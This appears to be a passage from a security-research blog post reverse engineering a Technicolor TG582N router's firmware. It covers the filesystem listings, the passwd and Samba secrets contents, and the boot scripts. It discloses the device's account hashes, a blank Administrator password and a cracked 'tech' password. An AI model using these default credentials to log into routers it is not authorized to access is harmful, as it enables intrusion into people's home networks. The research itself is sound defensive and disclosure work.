    β”‚Β Β  └── flash_image_fii
    β”œβ”€β”€ config-bank-999
    β”‚Β Β  β”œβ”€β”€ dl
    β”‚Β Β  β”‚Β Β  β”œβ”€β”€ persistent.cnf
    β”‚Β Β  β”‚Β Β  β”œβ”€β”€ phy.conf
    β”‚Β Β  β”‚Β Β  β”œβ”€β”€ seed.dat
    β”‚Β Β  β”‚Β Β  β”œβ”€β”€ stsZWEADQ8.CM0.upg
    β”‚Β Β  β”‚Β Β  β”œβ”€β”€ tls
    β”‚Β Β  β”‚Β Β  β”‚Β Β  β”œβ”€β”€ cert0001.pem
    β”‚Β Β  β”‚Β Β  β”‚Β Β  └── pkey0001.pem
    β”‚Β Β  β”‚Β Β  β”œβ”€β”€ user.ini
    β”‚Β Β  β”‚Β Β  └── xdsl.inf
    β”‚Β Β  β”œβ”€β”€ etc
    β”‚Β Β  β”‚Β Β  β”œβ”€β”€ group
    β”‚Β Β  β”‚Β Β  β”œβ”€β”€ gshadow
    β”‚Β Β  β”‚Β Β  β”œβ”€β”€ passwd
    β”‚Β Β  β”‚Β Β  β”œβ”€β”€ resolv.conf
    β”‚Β Β  β”‚Β Β  β”œβ”€β”€ secrets.tdb
    β”‚Β Β  β”‚Β Β  β”œβ”€β”€ shadow
    β”‚Β Β  β”‚Β Β  β”œβ”€β”€ smb.conf
    β”‚Β Β  β”‚Β Β  └── smbpasswd
    β”‚Β Β  └── version
    └── config-bank-lastboot -> /userfs/config-bank-999
jffs2-root-1
└── fs_1
    β”œβ”€β”€ config-bank-lastboot -> /userfs/config-bank-999
    β”œβ”€β”€ group
    β”œβ”€β”€ passwd
    β”œβ”€β”€ persistent.cnf
    β”œβ”€β”€ phy.conf
    β”œβ”€β”€ secrets.tdb
    β”œβ”€β”€ smb.conf
    β”œβ”€β”€ smbpasswd
    β”œβ”€β”€ stsZWEADQ8.CM0.upg
    β”œβ”€β”€ user.ini
    └── xdsl.inf
jffs2-root-10
└── fs_1
    β”œβ”€β”€ config-bank-lastboot -> /userfs/config-bank-999
    β”œβ”€β”€ group
    β”œβ”€β”€ passwd
    β”œβ”€β”€ persistent.cnf
    β”œβ”€β”€ smbpasswd
    └── user.ini
jffs2-root-11
└── fs_1
    β”œβ”€β”€ config-bank-lastboot -> /userfs/config-bank-999
    β”œβ”€β”€ group
    β”œβ”€β”€ passwd
    β”œβ”€β”€ persistent.cnf
    β”œβ”€β”€ smbpasswd
    └── user.ini
jffs2-root-12
└── fs_1
    β”œβ”€β”€ config-bank-lastboot -> /userfs/config-bank-999
    β”œβ”€β”€ group
    β”œβ”€β”€ passwd
    β”œβ”€β”€ persistent.cnf
    β”œβ”€β”€ smbpasswd
    └── user.ini
jffs2-root-13
└── fs_1
    β”œβ”€β”€ config-bank-lastboot -> /userfs/config-bank-999
    β”œβ”€β”€ group
    β”œβ”€β”€ passwd
    β”œβ”€β”€ persistent.cnf
    β”œβ”€β”€ smbpasswd
    └── user.ini
jffs2-root-14
└── fs_1
    β”œβ”€β”€ config-bank-lastboot -> /userfs/config-bank-999
    β”œβ”€β”€ group
    β”œβ”€β”€ passwd
    β”œβ”€β”€ persistent.cnf
    β”œβ”€β”€ smbpasswd
    └── user.ini
jffs2-root-15
└── fs_1
    β”œβ”€β”€ config-bank-lastboot -> /userfs/config-bank-999
    β”œβ”€β”€ group
    β”œβ”€β”€ passwd
    β”œβ”€β”€ persistent.cnf
    β”œβ”€β”€ smbpasswd
    └── user.ini
jffs2-root-16
└── fs_1
    β”œβ”€β”€ config-bank-lastboot -> /userfs/config-bank-999
    β”œβ”€β”€ group
    β”œβ”€β”€ passwd
    β”œβ”€β”€ persistent.cnf
    β”œβ”€β”€ smbpasswd
    └── user.ini
jffs2-root-17
└── fs_1
    β”œβ”€β”€ config-bank-lastboot -> /userfs/config-bank-999
    β”œβ”€β”€ group
    β”œβ”€β”€ passwd
    β”œβ”€β”€ persistent.cnf
    β”œβ”€β”€ smbpasswd
    └── user.ini
jffs2-root-18
└── fs_1
    β”œβ”€β”€ config-bank-lastboot -> /userfs/config-bank-999
    β”œβ”€β”€ group
    β”œβ”€β”€ passwd
    β”œβ”€β”€ persistent.cnf
    β”œβ”€β”€ smbpasswd
    └── user.ini
jffs2-root-19
└── fs_1
    β”œβ”€β”€ config-bank-lastboot -> /userfs/config-bank-999
    β”œβ”€β”€ group
    β”œβ”€β”€ passwd
    β”œβ”€β”€ persistent.cnf
    β”œβ”€β”€ smbpasswd
    └── user.ini
jffs2-root-2
└── fs_1
    β”œβ”€β”€ config-bank-lastboot -> /userfs/config-bank-999
    β”œβ”€β”€ group
    β”œβ”€β”€ passwd
    β”œβ”€β”€ persistent.cnf
    β”œβ”€β”€ secrets.tdb
    β”œβ”€β”€ smb.conf
    β”œβ”€β”€ smbpasswd
    β”œβ”€β”€ stsZWEADQ8.CM0.upg
    β”œβ”€β”€ user.ini
    └── xdsl.inf
jffs2-root-20
└── fs_1
    β”œβ”€β”€ config-bank-lastboot -> /userfs/config-bank-999
    β”œβ”€β”€ group
    β”œβ”€β”€ passwd
    β”œβ”€β”€ persistent.cnf
    β”œβ”€β”€ smbpasswd
    └── user.ini
jffs2-root-21
└── fs_1
    β”œβ”€β”€ config-bank-lastboot -> /userfs/config-bank-999
    β”œβ”€β”€ group
    β”œβ”€β”€ passwd
    β”œβ”€β”€ persistent.cnf
    β”œβ”€β”€ smbpasswd
    └── user.ini
jffs2-root-22
└── fs_1
    β”œβ”€β”€ config-bank-lastboot -> /userfs/config-bank-999
    β”œβ”€β”€ group
    β”œβ”€β”€ passwd
    β”œβ”€β”€ persistent.cnf
    β”œβ”€β”€ smbpasswd
    └── user.ini
jffs2-root-23
└── fs_1
    β”œβ”€β”€ config-bank-lastboot -> /userfs/config-bank-999
    β”œβ”€β”€ group
    β”œβ”€β”€ passwd
    β”œβ”€β”€ persistent.cnf
    β”œβ”€β”€ smbpasswd
    └── user.ini
jffs2-root-24
└── fs_1
    β”œβ”€β”€ config-bank-lastboot -> /userfs/config-bank-999
    β”œβ”€β”€ group
    β”œβ”€β”€ passwd
    └── smbpasswd
jffs2-root-25
└── fs_1
    β”œβ”€β”€ config-bank-lastboot -> /userfs/config-bank-999
    β”œβ”€β”€ group
    β”œβ”€β”€ passwd
    └── smbpasswd
jffs2-root-26
└── fs_1
    β”œβ”€β”€ config-bank-lastboot -> /userfs/config-bank-999
    β”œβ”€β”€ group
    β”œβ”€β”€ passwd
    └── smbpasswd
jffs2-root-27
└── fs_1
    β”œβ”€β”€ passwd
    └── smbpasswd
jffs2-root-28
└── fs_1
    β”œβ”€β”€ passwd
    └── smbpasswd
jffs2-root-29
└── fs_1
    └── smbpasswd
jffs2-root-3
└── fs_1
    β”œβ”€β”€ config-bank-lastboot -> /userfs/config-bank-999
    β”œβ”€β”€ group
    β”œβ”€β”€ passwd
    β”œβ”€β”€ persistent.cnf
    β”œβ”€β”€ secrets.tdb
    β”œβ”€β”€ smb.conf
    β”œβ”€β”€ smbpasswd
    β”œβ”€β”€ user.ini
    └── xdsl.inf
jffs2-root-4
└── fs_1
    β”œβ”€β”€ config-bank-lastboot -> /userfs/config-bank-999
    β”œβ”€β”€ group
    β”œβ”€β”€ passwd
    β”œβ”€β”€ persistent.cnf
    β”œβ”€β”€ secrets.tdb
    β”œβ”€β”€ smbpasswd
    β”œβ”€β”€ user.ini
    └── xdsl.inf
jffs2-root-5
└── fs_1
    β”œβ”€β”€ config-bank-lastboot -> /userfs/config-bank-999
    β”œβ”€β”€ group
    β”œβ”€β”€ passwd
    β”œβ”€β”€ persistent.cnf
    β”œβ”€β”€ smbpasswd
    β”œβ”€β”€ user.ini
    └── xdsl.inf
jffs2-root-6
└── fs_1
    β”œβ”€β”€ config-bank-lastboot -> /userfs/config-bank-999
    β”œβ”€β”€ group
    β”œβ”€β”€ passwd
    β”œβ”€β”€ persistent.cnf
    β”œβ”€β”€ smbpasswd
    β”œβ”€β”€ user.ini
    └── xdsl.inf
jffs2-root-7
└── fs_1
    β”œβ”€β”€ config-bank-lastboot -> /userfs/config-bank-999
    β”œβ”€β”€ group
    β”œβ”€β”€ passwd
    β”œβ”€β”€ persistent.cnf
    β”œβ”€β”€ smbpasswd
    β”œβ”€β”€ user.ini
    └── xdsl.inf
jffs2-root-8
└── fs_1
    β”œβ”€β”€ config-bank-lastboot -> /userfs/config-bank-999
    β”œβ”€β”€ group
    β”œβ”€β”€ passwd
    β”œβ”€β”€ persistent.cnf
    β”œβ”€β”€ smbpasswd
    └── user.ini
jffs2-root-9
└── fs_1
    β”œβ”€β”€ config-bank-lastboot -> /userfs/config-bank-999
    β”œβ”€β”€ group
    β”œβ”€β”€ passwd
    β”œβ”€β”€ persistent.cnf
    β”œβ”€β”€ smbpasswd
    └── user.ini

41 directories, 210 files

Honestly I don't know why there are so much copies of same files but, definitely, we found what we were looking for: not only the passwd file but also certificates with private keys, user configurations, xdsl line configurations, etc.

Let's try to understand if there are any differences between files inside that directories, so we can narrow our analysis. With a basic bash scripting knowledge, we can use md5sum to find if files are the same. Turns out that almost every file are copies and the only variable is user.ini. Also, the .upg file appears to be the same of smbpasswd.

group b6645876780362adfefe6ae7aa2aa970
passwd ccfbeda0bfe6a969d9f3e95284e450be
persistent.cnf 0169902625104a21be24f44df679d610
phy.conf c176b13932e5bf01930a066491877986
secrets.tdb cbe77f45cae8dad41cb9bef73ed69ed6
smb.conf 7c6ed2fab7571c3441d3af6740f9d067
smbpasswd d41d8cd98f00b204e9800998ecf8427e
stsZWEADQ8.CM0.upg d41d8cd98f00b204e9800998ecf8427e
user.ini 080b575f72aa410d0d2606ed9f152c18
user.ini 1b37b14685d303d192c80e5e8c3e68c7
user.ini 1d57ab52d6fa5d4d61cf6f520ac62b29
user.ini 2113deb10fd3cc6e5e5d5fc44489ee13
user.ini 2fbe85cc5305473ad68ae9b842134696
user.ini 3a4860416befea32f5a6952f75c1073e
user.ini 4388cd21843a0e1dbc7ec8b9d6b0fe81
user.ini 59499065a1243c0fd0bc3aec77eb5052
user.ini 6281deec4ac9389b797afc4873b9a90a
user.ini 6400c4bc913e682e32e055d262c058d4
user.ini 8165fea871781c7320bd6ef3b201c90f
user.ini 8504dfd01106e4f2e2a21c6e7460964e
user.ini 919573ff12d4eabf968a6dfd97a7d616
user.ini c4f70675bc732dd93fc8bb9c9219fb74
user.ini cab37a7859e4cb319aa1684f9fbee277
user.ini e9930518fb8db6670f14af642e177083
xdsl.inf 25daad3d9e60b45043a70c4ab7d3b1c6

Let's analyze them:

group: standard file, the same you can find on all *nix systems but with interesting groups.

SuperUser::101:
TechnicalSupport::102:
Administrator::103:
WebsevUser::104:
LAN_Admin::105:
PowerUser::106:
User::107:
WAN_Admin::108:

passwd: the file we were looking for. This file will be slightly modified during boot because root access is somehow disabled but at least we found two users: Administrator and tech with relative hash.

root::0:0:Super User:/:/bin/sh
nobody:*:1:1:nobody:/:/bin/sh
mvfs:*:499:1::/var/mvfs:/bin/sh
Administrator:ANpAYtow5vx0U:500:103:Linux User:(null):/bin/sh
tech:RB6zAiLmCT4zM:501:102:Linux User:(null):/bin/sh

If you search on Google, turns out that the hash ANpAYtow5vx0Uwas generated by the command mkpasswd and here we can read that:

If your password is on this list, it is not secure. It was generated by using the program 'mkpasswd' and then not typing anything. It turns out that 'mkpasswd' doesn't make passwords, it makes password hashes. If you enter a blank password, it generates one of 4096 possible passwords.

So, Administrator user has a simple blank password, I didn't find anything similar with the hash of the tech user. For this user I started a simple crack session with john, and without any fancy cracking rig or powerful graphic video card, after an affordable cracking time (~ 2days) I managed to crack the password: it appears to be 55058391.

Reverse engineering the router Technicolor TG582N

secrets.tdb: related to Samba services, it stores passwords in clear text. This file can be opened with the tdbdump:

{
key(23) = "SECRETS/SID/TECHNICOLOR"
data(68) = "\01\04\00\00\00\00\00\05\00\00\00\15\89+\B5\E1jD\15P\1A\92\F03\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00"
}
{
key(17) = "INFO/random_seed\00"
data(4) = "y\04\00\00"
}

user.ini: router clear text configuration file.

There are some other files but, for now, we have enough to start.

Accessing the device...in some way

We found that the Administrator user has blank password. We can now login via console access. Tech user access is somehow disabled.

Username : Administrator
Password : 
------------------------------------------------------------------------

                             ______  Technicolor TG582n
                         ___/_____/\ 
                        /         /\\  8.C.M.0
                  _____/__       /  \\ 
                _/       /\_____/___ \  Copyright (c) 1999-2012, Technicolor
               //       /  \       /\ \
       _______//_______/    \     / _\/______ 
      /      / \       \    /    / /        /\
   __/      /   \       \  /    / /        / _\__ 
  / /      /     \_______\/    / /        / /   /\
 /_/______/___________________/ /________/ /___/  \ 
 \ \      \    ___________    \ \        \ \   \  /
  \_\      \  /          /\    \ \        \ \___\/
     \      \/          /  \    \ \        \  /
      \_____/          /    \    \ \________\/
           /__________/      \    \  /
           \   _____  \      /_____\/
            \ /    /\  \    /___\/    F.D.C. FW 14
             /____/  \  \  /
             \    \  /___\/
              \____\/

------------------------------------------------------------------------
{Administrator}=>
contentsharing          firewall                printersharing          
pwr                     service                 connection              
cwmp                    dhcp                    dns                     
download                dsd                     dyndns                  
eth                     atm                     config                  
debug                   env                     expr                    
grp                     hostmgr                 ids                    
igmp                    interface               ip                      
ipqos                   label                   language                
mbus                    memm                    mlp                     
mobile                  nat                     ppp                     
pptp                    ptrace                  script                  
sntp                    software                statecheck              
syslog                  system                  tls          
{Administrator}=>

I spent a lot of time poking around in this weird restricted shell. I wasn't able to escape to our beloved Busybox that I know is running below. No matter what I tried, I always ended up in this jail I could not escape. It seems to manage everything from the console access.

To confirm this theory, I found this old post:

Reverse engineering the router Technicolor TG582N

And suddenly I remembered this two sneaky files laying in the /nmon directory.

Reverse engineering the router Technicolor TG582N

I'm quite sure this program is run at boot time and, basically, take the control of the entire router. This can now be confirmed in the boot log above:

linux application start ...
wait for linux_appl to initialize (1)
wait for linux_appl to initialize (2)
************* ERROR RECORD *************
000000:00:00.000000
Application NMON started after POWERON.
****************** END *****************
wait for linux_appl to initialize (3)
appl_init: BUILD VERIFIED!
wait for linux_appl to initialize (4)
[SS EMUL] ERR: opening config file /active/ss.conf failed
End of initialisation
wait for linux_appl to initialize (5)

And this is the script that, at boot time, runs the linux_appl.exe

#
#/etc/init.d/linuxappl
#
#!/bin/sh

. /etc/init.d/mbusd_util

case $1 in
    start)
        TELLER=0
        # linux application configuration
        /bin/echo "linux application start ..."
        rm -f /var/run/linux_appl
        rm -f /var/run/init_finished
        mbusd_set_loadapp
        ../../nmon/linux_appl.exe /dev/nmon/nmontrace /dev/nmon/nmonerr /archive/ &
        while [ ! -f /var/run/linux_appl ]
        do
           TELLER=`expr ${TELLER} + 1`
           echo "wait for linux_appl to initialize (${TELLER})"
           sleep 1;
        done
        ;;
    stop)
        killall -9 linux_appl
        ;;
    *)

esac

Next steps

This ends up this phase of my journey. Honestly, I was (am) not prepared to impact in a so restricted and particular environment. My next steps will be to look the router from a network point of view, analyzing it while it's up & running, trying to find information within the services it runs and offers.

I hope you will find this post useful and if you have any hints or ideas to help me, please drop me a note.

❌